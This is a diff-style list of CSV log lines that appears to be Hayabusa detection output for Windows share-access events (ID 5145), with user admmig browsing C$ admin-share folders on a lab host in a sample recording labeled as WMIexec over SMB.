+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\Custom\Custom64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\en-US | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppReadiness | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
